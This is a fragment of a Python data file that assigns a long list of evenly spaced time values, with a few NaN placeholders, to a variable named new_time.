new_time = [0.0, 0.001, 0.003, 0.004, 0.006, 0.007, 0.008, 0.01, 0.011, 0.013, 0.014, 0.015, 0.017, 0.018, 0.019, 0.021, 0.022, 0.024, 0.025, 0.026, 0.028, 0.029, 0.031, 0.032, 0.033, 0.035, 0.036, 0.037, float("nan"), 0.04, 0.042, 0.043, 0.044, 0.046, 0.047, 0.049, 0.05, 0.051, float("nan"), 0.054, 0.056, 0.057, 0.058, 0.06, 0.061, 0.062, 0.064, 0.065, 0.067, 0.068, 0.069, 0.071, 0.072, 0.074, 0.075, 0.076, 0.078, float("nan"), 0.081, 0.082, 0.083, 0.085, 0.086, 0.087, 0.089, 0.09, 0.092, 0.093, 0.094, 0.096, 0.097, 0.099, 0.1, 0.101, 0.103, 0.104, 0.106, 0.107, 0.108, 0.11, 0.111, 0.113, 0.114, 0.115, 0.117, 0.118, 0.119, 0.121, 0.122, 0.124, 0.125, 0.126, 0.128, 0.129, 0.131, 0.132, 0.133, 0.135, 0.136, float("nan"), 0.139, 0.14, 0.142, 0.143, 0.144, 0.146, 0.147, 0.149, 0.15, 0.151, 0.153, 0.154, 0.156, 0.157, 0.158, 0.16, 0.161, 0.163, 0.164, 0.165, 0.167, 0.168, 0.169, 0.171, 0.172, 0.174, 0.175, 0.176, 0.178, 0.179, 0.181, 0.182, 0.183, 0.185, 0.186, 0.188, 0.189, 0.19, 0.192, 0.193, 0.194, 0.196, 0.197, 0.199, 0.2, 0.201, 0.203, 0.204, 0.206, 0.207, 0.208, 0.21, 0.211, 0.212, 0.214, 0.215, 0.217, 0.218, 0.219, 0.221, 0.222, 0.224, 0.225, 0.226, 0.228, 0.229, 0.231, 0.232, 0.233, 0.235, 0.236, 0.237, 0.239, 0.24, 0.242, 0.243, 0.244, 0.246, 0.247, 0.249, 0.25, 0.251, 0.253, 0.254, 0.256, 0.257, 0.258, 0.26, 0.261, 0.263, 0.264, 0.265, 0.267, 0.268, 0.269, 0.271, 0.272, 0.274, 0.275, 0.276, 0.278, 0.279, 0.281, 0.282, 0.283, 0.285, 0.286, 0.287, 0.289, 0.29, 0.292, 0.293, 0.294, 0.296, 0.297, 0.299, 0.3, 0.301, 0.303, 0.304, 0.306, 0.307, 0.308, 0.31, 0.311, 0.312, 0.314, 0.315, 0.317, 0.318, 0.319, 0.321, 0.322, 0.324, 0.325, 0.326, 0.328, 0.329, 0.331, 0.332, 0.333, 0.335, 0.336, 0.338, 0.339, 0.34, 0.342, 0.343, 0.344, 0.346, 0.347, 0.349, 0.35, 0.351, 0.353, 0.354, 0.356, 0.357, 0.358, 0.36, 0.361, 0.362, 0.364, 0.365, 0.367, 0.368, 0.369, 0.371, 0.372, 0.374, 0.375, 0.376, 0.378, 0.379, 0.381, 0.382, 0.383, 0.385, 0.386, 0.388, 0.389, 0.39, 0.392, 0.393, 0.394, 0.396, 0.397, 0.399, 0.4, 0.401, 0.403, 0.404, 0.406, 0.407, 0.408, 0.41, 0.411, 0.412, 0.414, 0.415, 0.417, 0.418, 0.419, 0.421, 0.422, 0.424, 0.425, 0.426, 0.428, 0.429, 0.431, 0.432, 0.433, 0.435, 0.436, 0.438, 0.439, 0.44, 0.442, 0.443, 0.444, 0.446, 0.447, 0.449, 0.45, 0.451, 0.453, 0.454, 0.456, 0.457, 0.458, 0.46, 0.461, 0.463, 0.464, 0.465, 0.467, 0.468, 0.469, 0.471, 0.472, 0.474, 0.475, 0.476, 0.478, 0.479, 0.481, 0.482, 0.483, 0.485, 0.486, 0.487, 0.489, 0.49, 0.492, 0.493, 0.494, 0.496, 0.497, 0.499, 0.5, 0.501, 0.503, 0.504, 0.506, 0.507, 0.508, 0.51, 0.511, 0.512, 0.514, 0.515, 0.517, 0.518, 0.519, 0.521, 0.522, 0.524, 0.525, 0.526, 0.528, 0.529, 0.531, 0.532, 0.533, 0.535, 0.536, 0.537, 0.539, 0.54, 0.542, 0.543, 0.544, 0.546, 0.547, 0.549, 0.55, 0.551, 0.553, 0.554, 0.556, 0.557, 0.558, 0.56, 0.561, 0.562, 0.564, 0.565, 0.567, 0.568, 0.569, 0.571, 0.572, 0.574, 0.575, 0.576, 0.578, 0.579, 0.581, 0.582, 0.583, 0.585, 0.586, 0.588, 0.589, 0.59, 0.592, 0.593, 0.594, 0.596, 0.597, 0.599, 0.6, 0.601, 0.603, 0.604, 0.606, 0.607, 0.608, 0.61, 0.611, 0.613, 0.614, 0.615, 0.617, 0.618, 0.619, 0.621, 0.622, 0.624, 0.625, 0.626, 0.628, 0.629, 0.631, 0.632, 0.633, 0.635, 0.636, 0.637, 0.639, 0.64, 0.642, 0.643, 0.644, 0.646, 0.647, 0.649, 0.65, 0.651, 0.653, 0.654, 0.656, 0.657, 0.658, 0.66, 0.661, 0.662, 0.664, 0.665, 0.667, 0.668, 0.669, 0.671, 0.672, 0.674, 0.675, 0.676, 0.678, 0.679, 0.681, 0.682, 0.683, 0.685, 0.686, 0.688, 0.689, 0.69, 0.692, 0.693, 0.694, 0.696, 0.697, 0.699, 0.7, 0.701, 0.703, 0.704, 0.706, 0.707, 0.708, 0.71, 0.711, 0.713, 0.714, 0.715, 0.717, 0.718, 0.719, 0.721, 0.722, 0.724, 0.725, 0.726, 0.728, 0.729, 0.731, 0.732, 0.733, 0.735, 0.736, 0.738, 0.739, 0.74, 0.742, 0.743, 0.744, 0.746, 0.747, 0.749, 0.75, 0.751, 0.753, 0.754, 0.756, 0.757, 0.758, 0.76, 0.761, 0.762, 0.764, 0.765, 0.767, 0.768, 0.769, 0.771, 0.772, 0.774, 0.775, 0.776, 0.778, 0.779, 0.781, 0.782, 0.783, 0.785, 0.786, 0.787, 0.789, 0.79, 0.792, 0.793, 0.794, 0.796, 0.797, 0.799, 0.8, 0.801, 0.803, 0.804, 0.806, 0.807, 0.808, 0.81, 0.811, 0.812, 0.814, 0.815, 0.817, 0.818, 0.819, 0.821, 0.822, 0.824, 0.825, 0.826, 0.828, 0.829, 0.831, 0.832, 0.833, 0.835, 0.836, 0.838, 0.839, 0.84, 0.842, 0.843, 0.844, 0.846, 0.847, 0.849, 0.85, 0.851, 0.853, 0.854, 0.856, 0.857, 0.858, 0.86, 0.861, 0.863, 0.864, 0.865, 0.867, 0.868, 0.869, 0.871, 0.872, 0.874, 0.875, 0.876, 0.878, 0.879, 0.881, 0.882, 0.883, 0.885, 0.886, 0.887, 0.889, 0.89, 0.892, 0.893, 0.894, 0.896, 0.897, 0.899, 0.9, 0.901, 0.903, 0.904, 0.906, 0.907, 0.908, 0.91, 0.911, 0.912, 0.914, 0.915, 0.917, 0.918, 0.919, 0.921, 0.922, 0.924, 0.925, 0.926, 0.928, 0.929, 0.931, 0.932, 0.933, 0.935, 0.936, 0.938, 0.939, 0.94, 0.942, 0.943, 0.944, 0.946, 0.947, 0.949, 0.95, 0.951, 0.953, 0.954, 0.956, 0.957, 0.958, 0.96, 0.961, 0.963, 0.964, 0.965, 0.967, 0.968, 0.969, 0.971, 0.972, 0.974, 0.975, 0.976, 0.978, 0.979, 0.981, 0.982, 0.983, 0.985, 0.986, 0.988, 0.989, 0.99, 0.992, 0.993, 0.994, 0.996, 0.997, 0.999, 1.0, 1.001, 1.003, 1.004, 1.006, 1.007, 1.008, 1.01, 1.011, 1.012, 1.014, 1.015, 1.017, 1.018, 1.019, 1.021, 1.022, 1.024, 1.025, 1.026, 1.028, 1.029, 1.031, 1.032, 1.033, 1.035, 1.036, 1.038, 1.039, 1.04, 1.042, 1.043, 1.044, 1.046, 1.047, 1.049, 1.05, 1.051, 1.053, 1.054, 1.056, 1.057, 1.058, 1.06, 1.061, 1.062, 1.064, 1.065, 1.067, 1.068, 1.069, 1.071, 1.072, 1.074, 1.075, 1.076, 1.078, 1.079, 1.081, 1.082, 1.083, 1.085, 1.086, 1.087, 1.089, 1.09, 1.092, 1.093, 1.094, 1.096, 1.097, 1.099, 1.1, 1.101, 1.103, 1.104, 1.106, 1.107, 1.108, 1.11, 1.111, 1.113, 1.114, 1.115, 1.117, 1.118, 1.119, 1.121, 1.122, 1.124, 1.125, 1.126, 1.128, 1.129, 1.131, 1.132, 1.133, 1.135, 1.136, 1.137, 1.139, 1.14, 1.142, 1.143, 1.144, 1.146, 1.147, 1.149, 1.15, 1.151, 1.153, 1.154, 1.156, 1.157, 1.158, 1.16, 1.161, 1.163, 1.164, 1.165, 1.167, 1.168, 1.169, 1.171, 1.172, 1.174, 1.175, 1.176, 1.178, 1.179, 1.181, 1.182, 1.183, 1.185, 1.186, 1.188, 1.189, 1.19, 1.192, 1.193, 1.194, 1.196, 1.197, 1.199, 1.2, 1.201, 1.203, 1.204, 1.206, 1.207, 1.208, 1.21, 1.211, 1.212, 1.214, 1.215, 1.217, 1.218, 1.219, 1.221, 1.222, 1.224, 1.225, 1.226, 1.228, 1.229, 1.231, 1.232, 1.233, 1.235, 1.236, 1.238, 1.239, 1.24, 1.242, 1.243, 1.244, 1.246, 1.247, 1.249, 1.25, 1.251, 1.253, 1.254, 1.256, 1.257, 1.258, 1.26, 1.261, 1.262, 1.264, 1.265, 1.267, 1.268, 1.269, 1.271, 1.272, 1.274, 1.275, 1.276, 1.278, 1.279, 1.281, 1.282, 1.283, 1.285, 1.286, 1.288, 1.289, 1.29, 1.292, 1.293, 1.294, 1.296, 1.297, 1.299, 1.3, 1.301, 1.303, 1.304, 1.306, 1.307, 1.308, 1.31, 1.311, 1.312, 1.314, 1.315, 1.317, 1.318, 1.319, 1.321, 1.322, 1.324, 1.325, 1.326, 1.328, 1.329, 1.331, 1.332, 1.333, 1.335, 1.336, 1.337, 1.339, 1.34, 1.342, 1.343, 1.344, 1.346, 1.347, 1.349, 1.35, 1.351, 1.353, 1.354, 1.356, 1.357, 1.358, 1.36, 1.361, 1.363, 1.364, 1.365, 1.367, 1.368, 1.369, 1.371, 1.372, 1.374, 1.375, 1.376, 1.378, 1.379, 1.381, 1.382, 1.383, 1.385, 1.386, 1.387, 1.389, 1.39, 1.392, 1.393, 1.394, 1.396, 1.397, 1.399, 1.4, 1.401, 1.403, 1.404, 1.406, 1.407, 1.408, 1.41, 1.411, 1.413, 1.414, 1.415, 1.417, 1.418, 1.419, 1.421, 1.422, 1.424, 1.425, 1.426, 1.428, 1.429, 1.431, 1.432, 1.433, 1.435, 1.436, 1.438, 1.439, 1.44, 1.442, 1.443, 1.444, 1.446, 1.447, 1.449, 1.45, 1.451, 1.453, 1.454, 1.456, 1.457, 1.458, 1.46, 1.461, 1.462, 1.464, 1.465, 1.467, 1.468, 1.469, 1.471, 1.472, 1.474, 1.475, 1.476, 1.478, 1.479, 1.481, 1.482, 1.483, 1.485, 1.486, 1.488, 1.489, 1.49, 1.492, 1.493, 1.494, 1.496, 1.497, 1.499, 1.5, 1.501, 1.503, 1.504, 1.506, 1.507, 1.508, 1.51, 1.511, 1.512, 1.514, 1.515, 1.517, 1.518, 1.519, 1.521, 1.522, 1.524, 1.525, 1.526, 1.528, 1.529, 1.531, 1.532, 1.533, 1.535, 1.536, 1.538, 1.539, 1.54, 1.542, 1.543, 1.544, 1.546, 1.547, 1.549, 1.55, 1.551, 1.553, 1.554, 1.556, 1.557, 1.558, 1.56, 1.561, 1.562, 1.564, 1.565, 1.567, 1.568, 1.569, 1.571, 1.572, 1.574, 1.575, 1.576, 1.578, 1.579, 1.581, 1.582, 1.583, 1.585, 1.586, 1.587, 1.589, 1.59, 1.592, 1.593, 1.594, 1.596, 1.597, 1.599, 1.6, 1.601, 1.603, 1.604, 1.606, 1.607, 1.608, 1.61, 1.611, 1.613, 1.614, 1.615, 1.617, 1.618, 1.619, 1.621, 1.622, 1.624, 1.625, 1.626, 1.628, 1.629, 1.631, 1.632, 1.633, 1.635, 1.636, 1.637, 1.639, 1.64, 1.642, 1.643, 1.644, 1.646, 1.647, 1.649, 1.65, 1.651, 1.653, 1.654, 1.656, 1.657, 1.658, 1.66, 1.661, 1.663, 1.664, 1.665, 1.667, 1.668, 1.669, 1.671, 1.672, 1.674, 1.675, 1.676, 1.678, 1.679, 1.681, 1.682, 1.683, 1.685, 1.686, 1.688, 1.689, 1.69, 1.692, 1.693, 1.694, 1.696, 1.697, 1.699, 1.7, 1.701, 1.703, 1.704, 1.706, 1.707, 1.708, 1.71, 1.711, 1.712, 1.714, 1.715, 1.717, 1.718, 1.719, 1.721, 1.722, 1.724, 1.725, 1.726, 1.728, 1.729, 1.731, 1.732, 1.733, 1.735, 1.736, 1.738, 1.739, 1.74, 1.742, 1.743, 1.744, 1.746, 1.747, 1.749, 1.75, 1.751, 1.753, 1.754, 1.756, 1.757, 1.758, 1.76, 1.761, 1.762, 1.764, 1.765, 1.767, 1.768, 1.769, 1.771, 1.772, 1.774, 1.775, 1.776, 1.778, 1.779, 1.781, 1.782, 1.783, 1.785, 1.786, 1.788, 1.789, 1.79, 1.792, 1.793, 1.794, 1.796, 1.797, 1.799, 1.8, 1.801, 1.803, 1.804, 1.806, 1.807, 1.808, 1.81, 1.811, 1.812, 1.814, 1.815, 1.817, 1.818, 1.819, 1.821, 1.822, 1.824, 1.825, 1.826, 1.828, 1.829, 1.831, 1.832, 1.833, 1.835, 1.836, 1.837, 1.839, 1.84, 1.842, 1.843, 1.844, 1.846, 1.847, 1.849, 1.85, 1.851, 1.853, 1.854, 1.856, 1.857, 1.858, 1.86, 1.861, 1.863, 1.864, 1.865, 1.867, 1.868, 1.869, 1.871, 1.872, 1.874, 1.875, 1.876, 1.878, 1.879, 1.881, 1.882, 1.883, 1.885, 1.886, 1.887, 1.889, 1.89, 1.892, 1.893, 1.894, 1.896, 1.897, 1.899, 1.9, 1.901, 1.903, 1.904, 1.906, 1.907, 1.908, 1.91, 1.911, 1.913, 1.914, 1.915, 1.917, 1.918, 1.919, 1.921, 1.922, 1.924, 1.925, 1.926, 1.928, 1.929, 1.931, 1.932, 1.933, 1.935, 1.936, 1.938, 1.939, 1.94, 1.942, 1.943, 1.944, 1.946, 1.947, 1.949, 1.95, 1.951, 1.953, 1.954, 1.956, 1.957, 1.958, 1.96, 1.961, 1.962, 1.964, 1.965, 1.967, 1.968, 1.969, 1.971, 1.972, 1.974, 1.975, 1.976, 1.978, 1.979, 1.981, 1.982, 1.983, 1.985, 1.986, 1.988, 1.989, 1.99, 1.992, 1.993, 1.994, 1.996, 1.997, 1.999, 2.0, 2.001, 2.003, 2.004, 2.006, 2.007, 2.008, 2.01, 2.011, 2.013, 2.014, 2.015, 2.017, 2.018, 2.019, 2.021, 2.022, 2.024, 2.025, 2.026, 2.028, 2.029, 2.031, 2.032, 2.033, 2.035, 2.036, 2.038, 2.039, 2.04, 2.042, 2.043, 2.044, 2.046, 2.047, 2.049, 2.05, 2.051, 2.053, 2.054, 2.056, 2.057, 2.058, 2.06, 2.061, 2.062, 2.064, 2.065, 2.067, 2.068, 2.069, 2.071, 2.072, 2.074, 2.075, 2.076, 2.078, 2.079, 2.081, 2.082, 2.083, 2.085, 2.086, 2.087, 2.089, 2.09, 2.092, 2.093, 2.094, 2.096, 2.097, 2.099, 2.1, 2.101, 2.103, 2.104, 2.106, 2.107, 2.108, 2.11, 2.111, 2.112, 2.114, 2.115, 2.117, 2.118, 2.119, 2.121, 2.122, 2.124, 2.125, 2.126, 2.128, 2.129, 2.131, 2.132, 2.133, 2.135, 2.136, 2.138, 2.139, 2.14, 2.142, 2.143, 2.144, 2.146, 2.147, 2.149, 2.15, 2.151, 2.153, 2.154, 2.156, 2.157, 2.158, 2.16, 2.161, 2.163, 2.164, 2.165, 2.167, 2.168, 2.169, 2.171, 2.172, 2.174, 2.175, 2.176, 2.178, 2.179, 2.181, 2.182, 2.183, 2.185, 2.186, 2.188, 2.189, 2.19, 2.192, 2.193, 2.194, 2.196, 2.197, 2.199, 2.2, 2.201, 2.203, 2.204, 2.206, 2.207, 2.208, 2.21, 2.211, 2.212, 2.214, 2.215, 2.217, 2.218, 2.219, 2.221, 2.222, 2.224, 2.225, 2.226, 2.228, 2.229, 2.231, 2.232, 2.233, 2.235, 2.236, 2.237, 2.239, 2.24, 2.242, 2.243, 2.244, 2.246, 2.247, 2.249, 2.25, 2.251, 2.253, 2.254, 2.256, 2.257, 2.258, 2.26, 2.261, 2.263, 2.264, 2.265, 2.267, 2.268, 2.269, 2.271, 2.272, 2.274, 2.275, 2.276, 2.278, 2.279, 2.281, 2.282, 2.283, 2.285, 2.286, 2.288, 2.289, 2.29, 2.292, 2.293, 2.294, 2.296, 2.297, 2.299, 2.3, 2.301, 2.303, 2.304, 2.306, 2.307, 2.308, 2.31, 2.311, 2.312, 2.314, 2.315, 2.317, 2.318, 2.319, 2.321, 2.322, 2.324, 2.325, 2.326, 2.328, 2.329, 2.331, 2.332, 2.333, 2.335, 2.336, 2.337, 2.339, 2.34, 2.342, 2.343, 2.344, 2.346, 2.347, 2.349, 2.35, 2.351, 2.353, 2.354, 2.356, 2.357, 2.358, 2.36, 2.361, 2.362, 2.364, 2.365, 2.367, 2.368, 2.369, 2.371, 2.372, 2.374, 2.375, 2.376, 2.378, 2.379, 2.381, 2.382, 2.383, 2.385, 2.386, 2.388, 2.389, 2.39, 2.392, 2.393, 2.394, 2.396, 2.397, 2.399, 2.4, 2.401, 2.403, 2.404, 2.406, 2.407, 2.408, 2.41, 2.411, 2.413, 2.414, 2.415, 2.417, 2.418, 2.419, 2.421, 2.422, 2.424, 2.425, 2.426, 2.428, 2.429, 2.431, 2.432, 2.433, 2.435, 2.436, 2.438, 2.439, 2.44, 2.442, 2.443, 2.444, 2.446, 2.447, 2.449, 2.45, 2.451, 2.453, 2.454, 2.456, 2.457, 2.458, 2.46, 2.461, 2.462, 2.464, 2.465, 2.467, 2.468, 2.469, 2.471, 2.472, 2.474, 2.475, 2.476, 2.478, 2.479, 2.481, 2.482, 2.483, 2.485, 2.486, 2.487, 2.489, 2.49, 2.492, 2.493, 2.494, 2.496, 2.497, 2.499, 2.5, 2.501, 2.503, 2.504, 2.506, 2.507, 2.508, 2.51, 2.511, 2.513, 2.514, 2.515, 2.517, 2.518, 2.519, 2.521, 2.522, 2.524, 2.525, 2.526, 2.528, 2.529, 2.531, 2.532, 2.533, 2.535, 2.536, 2.538, 2.539, 2.54, 2.542, 2.543, 2.544, 2.546, 2.547, 2.549, 2.55, 2.551, 2.553, 2.554, 2.556, 2.557, 2.558, 2.56, 2.561, 2.562, 2.564, 2.565, 2.567, 2.568, 2.569, 2.571, 2.572, 2.574, 2.575, 2.576, 2.578, 2.579, 2.581, 2.582, 2.583, 2.585, 2.586, 2.587, 2.589, 2.59, 2.592, 2.593, 2.594, 2.596, 2.597, 2.599, 2.6, 2.601, 2.603, 2.604, 2.606, 2.607, 2.608, 2.61, 2.611, 2.612, 2.614, 2.615, 2.617, 2.618, 2.619, 2.621, 2.622, 2.624, 2.625, 2.626, 2.628, 2.629, 2.631, 2.632, 2.633, 2.635, 2.636, 2.638, 2.639, 2.64, 2.642, 2.643, 2.644, 2.646, 2.647, 2.649, 2.65, 2.651, 2.653, 2.654, 2.656, 2.657, 2.658, 2.66, 2.661, 2.663, 2.664, 2.665, 2.667, 2.668, 2.669, 2.671, 2.672, 2.674, 2.675, 2.676, 2.678, 2.679, 2.681, 2.682, 2.683, 2.685, 2.686, 2.688, 2.689, 2.69, 2.692, 2.693, 2.694, 2.696, 2.697, 2.699, 2.7, 2.701, 2.703, 2.704, 2.706, 2.707, 2.708, 2.71, 2.711, 2.712, 2.714, 2.715, 2.717, 2.718, 2.719, 2.721, 2.722, 2.724, 2.725, 2.726, 2.728, 2.729, 2.731, 2.732, 2.733, 2.735, 2.736, 2.737, 2.739, 2.74, 2.742, 2.743, 2.744, 2.746, 2.747, 2.749, 2.75, 2.751, 2.753, 2.754, 2.756, 2.757, 2.758, 2.76, 2.761, 2.763, 2.764, 2.765, 2.767, 2.768, 2.769, 2.771, 2.772, 2.774, 2.775, 2.776, 2.778, 2.779, 2.781, 2.782, 2.783, 2.785, 2.786, 2.788, 2.789, 2.79, 2.792, 2.793, 2.794, 2.796, 2.797, 2.799, 2.8, 2.801, 2.803, 2.804, 2.806, 2.807, 2.808, 2.81, 2.811, 2.812, 2.814, 2.815, 2.817, 2.818, 2.819, 2.821, 2.822, 2.824, 2.825, 2.826, 2.828, 2.829, 2.831, 2.832, 2.833, 2.835, 2.836, 2.837, 2.839, 2.84, 2.842, 2.843, 2.844, 2.846, 2.847, 2.849, 2.85, 2.851, 2.853, 2.854, 2.856, 2.857, 2.858, 2.86, 2.861, 2.862, 2.864, 2.865, 2.867, 2.868, 2.869, 2.871, 2.872, 2.874, 2.875, 2.876, 2.878, 2.879, 2.881, 2.882, 2.883, 2.885, 2.886, 2.888, 2.889, 2.89, 2.892, 2.893, 2.894, 2.896, 2.897, 2.899, 2.9, 2.901, 2.903, 2.904, 2.906, 2.907, 2.908, 2.91, 2.911, 2.913, 2.914, 2.915, 2.917, 2.918, 2.919, 2.921, 2.922, 2.924, 2.925, 2.926, 2.928, 2.929, 2.931, 2.932, 2.933, 2.935, 2.936, 2.938, 2.939, 2.94, 2.942, 2.943, 2.944, 2.946, 2.947, 2.949, 2.95, 2.951, 2.953, 2.954, 2.956, 2.957, 2.958, 2.96, 2.961, 2.962, 2.964, 2.965, 2.967, 2.968, 2.969, 2.971, 2.972, 2.974, 2.975, 2.976, 2.978, 2.979, 2.981, 2.982, 2.983, 2.985, 2.986, 2.987, 2.989, 2.99, 2.992, 2.993, 2.994, 2.996, 2.997, 2.999, 3.0, 3.001, 3.003, 3.004, 3.006, 3.007, 3.008, 3.01, 3.011, 3.013, 3.014, 3.015, 3.017, 3.018, 3.019, 3.021, 3.022, 3.024, 3.025, 3.026, 3.028, 3.029, 3.031, 3.032, 3.033, 3.035, 3.036, 3.038, 3.039, 3.04, 3.042, 3.043, 3.044, 3.046, 3.047, 3.049, 3.05, 3.051, 3.053, 3.054, 3.056, 3.057, 3.058, 3.06, 3.061, 3.062, 3.064, 3.065, 3.067, 3.068, 3.069, 3.071, 3.072, 3.074, 3.075, 3.076, 3.078, 3.079, 3.081, 3.082, 3.083, 3.085, 3.086, 3.087, 3.089, 3.09, 3.092, 3.093, 3.094, 3.096, 3.097, 3.099, 3.1, 3.101, 3.103, 3.104, 3.106, 3.107, 3.108, 3.11, 3.111, 3.112, 3.114, 3.115, 3.117, 3.118, 3.119, 3.121, 3.122, 3.124, 3.125, 3.126, 3.128, 3.129, 3.131, 3.132, 3.133, 3.135, 3.136, 3.138, 3.139, 3.14, 3.142, 3.143, 3.144, 3.146, 3.147, 3.149, 3.15, 3.151, 3.153, 3.154, 3.156, 3.157, 3.158, 3.16, 3.161, 3.163, 3.164, 3.165, 3.167, 3.168, 3.169, 3.171, 3.172, 3.174, 3.175, 3.176, 3.178, 3.179, 3.181, 3.182, 3.183, 3.185, 3.186, 3.188, 3.189, 3.19, 3.192, 3.193, 3.194, 3.196, 3.197, 3.199, 3.2, 3.201, 3.203, 3.204, 3.206, 3.207, 3.208, 3.21, 3.211, 3.212, 3.214, 3.215, 3.217, 3.218, 3.219, 3.221, 3.222, 3.224, 3.225, 3.226, 3.228, 3.229, 3.231, 3.232, 3.233, 3.235, 3.236, 3.237, 3.239, 3.24, 3.242, 3.243, 3.244, 3.246, 3.247, 3.249, 3.25, 3.251, 3.253, 3.254, 3.256, 3.257, 3.258, 3.26, 3.261, 3.263, 3.264, 3.265, 3.267, 3.268, 3.269, 3.271, 3.272, 3.274, 3.275, 3.276, 3.278, 3.279, 3.281, 3.282, 3.283, 3.285, 3.286, 3.288, 3.289, 3.29, 3.292, 3.293, 3.294, 3.296, 3.297, 3.299, 3.3, 3.301, 3.303, 3.304, 3.306, 3.307, 3.308, 3.31, 3.311, 3.312, 3.314, 3.315, 3.317, 3.318, 3.319, 3.321, 3.322, 3.324, 3.325, 3.326, 3.328, 3.329, 3.331, 3.332, 3.333, 3.335, 3.336, 3.337, 3.339, 3.34, 3.342, 3.343, 3.344, 3.346, 3.347, 3.349, 3.35, 3.351, 3.353, 3.354, 3.356, 3.357, 3.358, 3.36, 3.361, 3.362, 3.364, 3.365, 3.367, 3.368, 3.369, 3.371, 3.372, 3.374, 3.375, 3.376, 3.378, 3.379, 3.381, 3.382, 3.383, 3.385, 3.386, 3.388, 3.389, 3.39, 3.392, 3.393, 3.394, 3.396, 3.397, 3.399, 3.4, 3.401, 3.403, 3.404, 3.406, 3.407, 3.408, 3.41, 3.411, 3.413, 3.414, 3.415, 3.417, 3.418, 3.419, 3.421, 3.422, 3.424, 3.425, 3.426, 3.428, 3.429, 3.431, 3.432, 3.433, 3.435, 3.436, 3.438, 3.439, 3.44, 3.442, 3.443, 3.444, 3.446, 3.447, 3.449, 3.45, 3.451, 3.453, 3.454, 3.456, 3.457, 3.458, 3.46, 3.461, 3.462, 3.464, 3.465, 3.467, 3.468, 3.469, 3.471, 3.472, 3.474, 3.475, 3.476, 3.478, 3.479, 3.481, 3.482, 3.483, 3.485, 3.486, 3.487, 3.489, 3.49, 3.492, 3.493, 3.494, 3.496, 3.497, 3.499, 3.5, 3.501, 3.503, 3.504, 3.506, 3.507, 3.508, 3.51, 3.511, 3.513, 3.514, 3.515, 3.517, 3.518, 3.519, 3.521, 3.522, 3.524, 3.525, 3.526, 3.528, 3.529, 3.531, 3.532, 3.533, 3.535, 3.536, 3.538, 3.539, 3.54, 3.542, 3.543, 3.544, 3.546, 3.547, 3.549, 3.55, 3.551, 3.553, 3.554, 3.556, 3.557, 3.558, 3.56, 3.561, 3.562, 3.564, 3.565, 3.567, 3.568, 3.569, 3.571, 3.572, 3.574, 3.575, 3.576, 3.578, 3.579, 3.581, 3.582, 3.583, 3.585, 3.586, 3.587, 3.589, 3.59, 3.592, 3.593, 3.594, 3.596, 3.597, 3.599, 3.6, 3.601, 3.603, 3.604, 3.606, 3.607, 3.608, 3.61, 3.611, 3.612, 3.614, 3.615, 3.617, 3.618, 3.619, 3.621, 3.622, 3.624, 3.625, 3.626, 3.628, 3.629, 3.631, 3.632, 3.633, 3.635, 3.636, 3.638, 3.639, 3.64, 3.642, 3.643, 3.644, 3.646, 3.647, 3.649, 3.65, 3.651, 3.653, 3.654, 3.656, 3.657, 3.658, 3.66, 3.661, 3.663, 3.664, 3.665, 3.667, 3.668, 3.669, 3.671, 3.672, 3.674, 3.675, 3.676, 3.678, 3.679, 3.681, 3.682, 3.683, 3.685, 3.686, 3.688, 3.689, 3.69, 3.692, 3.693, 3.694, 3.696, 3.697, 3.699, 3.7, 3.701, 3.703, 3.704, 3.706, 3.707, 3.708, 3.71, 3.711, 3.712, 3.714, 3.715, 3.717, 3.718, 3.719, 3.721, 3.722, 3.724, 3.725, 3.726, 3.728, 3.729, 3.731, 3.732, 3.733, 3.735, 3.736, 3.737, 3.739, 3.74, 3.742, 3.743, 3.744, 3.746, 3.747, 3.749, 3.75, 3.751, 3.753, 3.754, 3.756, 3.757, 3.758, 3.76, 3.761, 3.763, 3.764, 3.765, 3.767, 3.768, 3.769, 3.771, 3.772, 3.774, 3.775, 3.776, 3.778, 3.779, 3.781, 3.782, 3.783, 3.785, 3.786, 3.788, 3.789, 3.79, 3.792, 3.793, 3.794, 3.796, 3.797, 3.799, 3.8, 3.801, 3.803, 3.804, 3.806, 3.807, 3.808, 3.81, 3.811, 3.812, 3.814, 3.815, 3.817, 3.818, 3.819, 3.821, 3.822, 3.824, 3.825, 3.826, 3.828, 3.829, 3.831, 3.832, 3.833, 3.835, 3.836, 3.837, 3.839, 3.84, 3.842, 3.843, 3.844, 3.846, 3.847, 3.849, 3.85, 3.851, 3.853, 3.854, 3.856, 3.857, 3.858, 3.86, 3.861, 3.862, 3.864, 3.865, 3.867, 3.868, 3.869, 3.871, 3.872, 3.874, 3.875, 3.876, 3.878, 3.879, 3.881, 3.882, 3.883, 3.885, 3.886, 3.888, 3.889, 3.89, 3.892, 3.893, 3.894, 3.896, 3.897, 3.899, 3.9, 3.901, 3.903, 3.904, 3.906, 3.907, 3.908, 3.91, 3.911, 3.913, 3.914, 3.915, 3.917, 3.918, 3.919, 3.921, 3.922, 3.924, 3.925, 3.926, 3.928, 3.929, 3.931, 3.932, 3.933, 3.935, 3.936, 3.938, 3.939, 3.94, 3.942, 3.943, 3.944, 3.946, 3.947, 3.949, 3.95, 3.951, 3.953, 3.954, 3.956, 3.957, 3.958, 3.96, 3.961, 3.962, 3.964, 3.965, 3.967, 3.968, 3.969, 3.971, 3.972, 3.974, 3.975, 3.976, 3.978, 3.979, 3.981, 3.982, 3.983, 3.985, 3.986, 3.987, 3.989, 3.99, 3.992, 3.993, 3.994, 3.996, 3.997, 3.999, 4.0, 4.001, 4.003, 4.004, 4.006, 4.007, 4.008, 4.01, 4.011, 4.013, 4.014, 4.015, 4.017, 4.018, 4.019, 4.021, 4.022, 4.024, 4.025, 4.026, 4.028, 4.029, 4.031, 4.032, 4.033, 4.035, 4.036, 4.037, 4.039, 4.04, 4.042, 4.043, 4.044, 4.046, 4.047, 4.049, 4.05, 4.051, 4.053, 4.054, 4.056, 4.057, 4.058, 4.06, 4.061, 4.062, 4.064, 4.065, 4.067, 4.068, 4.069, 4.071, 4.072, 4.074, 4.075, 4.076, 4.078, 4.079, 4.081, 4.082, 4.083, 4.085, 4.086, 4.088, 4.089, 4.09, 4.092, 4.093, 4.094, 4.096, 4.097, 4.099, 4.1, 4.101, 4.103, 4.104, 4.106, 4.107, 4.108, 4.11, 4.111, 4.112, 4.114, 4.115, 4.117, 4.118, 4.119, 4.121, 4.122, 4.124, 4.125, 4.126, 4.128, 4.129, 4.131, 4.132, 4.133, 4.135, 4.136, 4.138, 4.139, 4.14, 4.142, 4.143, 4.144, 4.146, 4.147, 4.149, 4.15, 4.151, 4.153, 4.154, 4.156, 4.157, 4.158, 4.16, 4.161, 4.162, 